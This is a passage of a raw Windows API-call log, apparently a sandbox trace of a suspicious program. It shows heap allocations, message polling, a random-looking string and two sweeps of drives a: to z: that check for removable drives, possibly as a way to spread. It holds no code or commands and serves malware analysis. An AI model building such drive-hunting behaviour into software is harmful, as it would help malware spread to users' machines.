hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68c0 | out: hHeap=0x12c0000) returned 1 [0206.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6920 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a28 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68f0 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6938 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6950 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1313b60 | out: hHeap=0x12c0000) returned 1 [0206.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300338 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001d0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6698 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffb90 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff690 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132a2e8 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6500 | out: hHeap=0x12c0000) returned 1 [0206.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6620 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300040 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13000b8 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6668 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13023e0 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300220 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c8a0 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65f0 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b64e8 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302488 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffca8 | out: hHeap=0x12c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1311b00 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6908 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67e8 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69c8 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fffa0 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65c0 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302680 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff5f0 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6aa0 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6998 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe60 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300360 | out: hHeap=0x12c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6860 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13024c0 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001a8 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6968 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302098 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001f8 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0030 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300108 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0206.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.297] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0206.297] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.297] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.297] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0206.297] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.297] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.298] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0206.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.298] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0206.298] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.298] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.299] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.299] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.299] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.299] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.299] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.299] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.300] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.300] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.300] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.300] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.301] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.301] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.301] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.301] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.301] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.301] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.302] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.302] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.303] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.303] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.303] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.303] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.304] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.304] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.304] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.304] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.305] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0206.305] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.305] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0206.306] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0206.306] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.306] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.306] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.307] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.307] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.307] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0206.307] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0206.307] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.307] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.308] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.308] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.308] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.308] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.308] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.308] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.309] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.309] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.309] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.309] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.309] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.309] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.310] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.310] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.310] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.310] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.310] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.311] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.311] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.311] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.311] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.311] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.311] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.312] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.312] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.313] 